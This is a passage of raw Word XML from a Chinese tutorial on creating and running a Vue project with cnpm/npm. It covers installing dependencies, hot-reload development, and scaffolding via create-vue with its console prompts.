        </w:rPr>
        <w:t>代替</w:t>
      </w:r>
      <w:r w:rsidRPr="00F81627">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>npm</w:t>
      </w:r>
      <w:r w:rsidRPr="00F81627">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，运行别人的代码需要先安装依赖</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果创建项目的时候没有报错，这一步可以省略。如果报错了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> cd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>到项目里面运行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> cnpm install / npm install</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30133073" w14:textId="77777777" w:rsidR="00F81627" w:rsidRDefault="00F81627" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C2B5A05" w14:textId="0DD6BF59" w:rsidR="00615D6B" w:rsidRDefault="00F81627" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>若拿到别人的项目或从</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>g</w:t>
      </w:r>
      <w:r w:rsidR="008B6C40">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>thub</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上下载的项目第一步就是要在项目中</w:t>
      </w:r>
      <w:r w:rsidRPr="00F11523">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>cnpm install</w:t>
      </w:r>
      <w:r w:rsidRPr="00F11523">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下载项目所依赖的插件，然后</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">npm run dev </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>运行项目</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="662943A3" w14:textId="77777777" w:rsidR="00615D6B" w:rsidRDefault="00615D6B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5814AB8A" w14:textId="18068431" w:rsidR="00615D6B" w:rsidRDefault="002F3227" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="002F3227">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安装完成之后，我们到自己的项目中去看，</w:t>
      </w:r>
      <w:r w:rsidRPr="008B6C40">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>会多一个</w:t>
      </w:r>
      <w:r w:rsidRPr="008B6C40">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>node_modules</w:t>
      </w:r>
      <w:r w:rsidRPr="008B6C40">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>文件夹</w:t>
      </w:r>
      <w:r w:rsidRPr="002F3227">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，这里面就是我们所需要的依赖包资源。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C05B97B" w14:textId="77777777" w:rsidR="00615D6B" w:rsidRDefault="00615D6B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72A9702F" w14:textId="678E4FA1" w:rsidR="00615D6B" w:rsidRDefault="008B6C40" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在项目目录中，</w:t>
      </w:r>
      <w:r w:rsidRPr="0054069C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>运行命令</w:t>
      </w:r>
      <w:r w:rsidRPr="0054069C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> npm run dev </w:t>
      </w:r>
      <w:r w:rsidRPr="0054069C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="0054069C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>npm run start</w:t>
      </w:r>
      <w:r w:rsidRPr="0054069C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>）或</w:t>
      </w:r>
      <w:r w:rsidRPr="0054069C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>cnpm</w:t>
      </w:r>
      <w:r w:rsidRPr="0054069C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>替代</w:t>
      </w:r>
      <w:r w:rsidRPr="0054069C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>npm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，会用热加载的方式运行我们的应用，热加载可以让我们在修改完代码后不用手动刷新浏览器就能实时看到修改后的效果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6941A65F" w14:textId="77777777" w:rsidR="00615D6B" w:rsidRDefault="00615D6B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3165D608" w14:textId="1E40ADE8" w:rsidR="00592D55" w:rsidRDefault="00F11523" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>additional</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00592D55" w:rsidRPr="0079447F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>安装热修改插件：</w:t>
      </w:r>
      <w:r w:rsidR="00592D55" w:rsidRPr="0079447F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidR="00592D55" w:rsidRPr="0079447F">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>npm install –save vue-hot-reload-api</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22FF811A" w14:textId="77777777" w:rsidR="00592D55" w:rsidRDefault="00592D55" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49DE16B3" w14:textId="17026213" w:rsidR="00BC54F2" w:rsidRDefault="00592D55" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>成功显示</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>VUE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>页面，</w:t>
      </w:r>
      <w:r w:rsidR="00BC54F2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如图所示：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1698688D" w14:textId="0314BA07" w:rsidR="00615D6B" w:rsidRDefault="00BC54F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4D314A13" wp14:editId="277ED8A2">
            <wp:extent cx="4919038" cy="2712992"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1469519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19678" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId178"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4920534" cy="2713817"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FEF9B1F" w14:textId="77777777" w:rsidR="00615D6B" w:rsidRDefault="00615D6B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="561EF36A" w14:textId="77777777" w:rsidR="00615D6B" w:rsidRDefault="00615D6B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C6D0CC9" w14:textId="1B0FACC1" w:rsidR="00615D6B" w:rsidRDefault="002E497B" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="677" w:name="_Toc159780107"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>其二</w:t>
      </w:r>
      <w:r w:rsidR="00F11523">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00F11523">
        <w:t xml:space="preserve"> cnpm init vue@lastest</w:t>
      </w:r>
      <w:bookmarkEnd w:id="677"/>
    </w:p>
    <w:p w14:paraId="1A13E601" w14:textId="1B14B3EE" w:rsidR="002E497B" w:rsidRPr="002E497B" w:rsidRDefault="002E497B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E497B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>cnpm init vue@latest</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>回答基本默认就行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="086B8151" w14:textId="77777777" w:rsidR="002E497B" w:rsidRDefault="002E497B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Need to install the following packages:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F4CC8CF" w14:textId="77777777" w:rsidR="002E497B" w:rsidRDefault="002E497B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>create-vue@3.9.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC07282" w14:textId="77777777" w:rsidR="002E497B" w:rsidRDefault="002E497B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Ok to proceed? (y) y</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F5BFBD" w14:textId="77777777" w:rsidR="002E497B" w:rsidRDefault="002E497B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>npm WARN EBADENGINE Unsupported engine {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C99FB0" w14:textId="77777777" w:rsidR="002E497B" w:rsidRDefault="002E497B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>npm WARN EBADENGINE   package: 'create-vue@3.9.0',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BFFD750" w14:textId="77777777" w:rsidR="002E497B" w:rsidRDefault="002E497B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>npm WARN EBADENGINE   required: { node: '&gt;=v16.20.0' },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F3F0A2" w14:textId="77777777" w:rsidR="002E497B" w:rsidRDefault="002E497B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>npm WARN EBADENGINE   current: { node: 'v16.13.2', npm: '9.9.2' }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29631ECA" w14:textId="77777777" w:rsidR="002E497B" w:rsidRDefault="002E497B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>npm WARN EBADENGINE }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA0FE1B" w14:textId="77777777" w:rsidR="002E497B" w:rsidRDefault="002E497B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D41252A" w14:textId="77777777" w:rsidR="002E497B" w:rsidRDefault="002E497B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Vue.js - The Progressive JavaScript Framework</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="773BAC33" w14:textId="77777777" w:rsidR="002E497B" w:rsidRDefault="002E497B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="474A08C1" w14:textId="77777777" w:rsidR="002E497B" w:rsidRDefault="002E497B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>√</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请输入项目名称：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> ... front</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E3EA110" w14:textId="77777777" w:rsidR="002E497B" w:rsidRDefault="002E497B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>√</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是否使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> TypeScript </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语法？</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> ... </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>否</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B5D18E" w14:textId="77777777" w:rsidR="002E497B" w:rsidRDefault="002E497B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>√</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是否启用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> JSX </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>支持？</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> ... </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>否</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31352069" w14:textId="77777777" w:rsidR="002E497B" w:rsidRDefault="002E497B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>√</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是否引入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Vue Router </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进行单页面应用开发？</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> ... </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>否</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E291E3B" w14:textId="77777777" w:rsidR="002E497B" w:rsidRDefault="002E497B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>√</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是否引入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Pinia </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用于状态管理？</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> ... </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>否</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A799F36" w14:textId="77777777" w:rsidR="002E497B" w:rsidRDefault="002E497B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>√</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是否引入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Vitest </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用于单元测试？</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> ... </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>否</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56DDDC64" w14:textId="77777777" w:rsidR="002E497B" w:rsidRDefault="002E497B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>√</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是否要引入一款端到端（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>End to End</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）测试工具？</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> » </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不需要</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="185CD93F" w14:textId="77777777" w:rsidR="002E497B" w:rsidRDefault="002E497B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>√</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是否引入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> ESLint </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用于代码质量检测？</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> ... </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>否</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D071576" w14:textId="77777777" w:rsidR="002E497B" w:rsidRDefault="002E497B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53CF25F5" w14:textId="77777777" w:rsidR="002E497B" w:rsidRDefault="002E497B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>正在构建项目</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> C:\Users\ranja\Desktop\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>工作任务</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>\exam_system\exam_system\front...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF01CE4" w14:textId="77777777" w:rsidR="002E497B" w:rsidRDefault="002E497B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32913E75" w14:textId="77777777" w:rsidR="002E497B" w:rsidRDefault="002E497B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>项目构建完成，可执行以下命令：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0915CA00" w14:textId="77777777" w:rsidR="002E497B" w:rsidRDefault="002E497B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23F31E05" w14:textId="77777777" w:rsidR="002E497B" w:rsidRDefault="002E497B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  cd front</w:t>
      </w:r>
    </w:p>
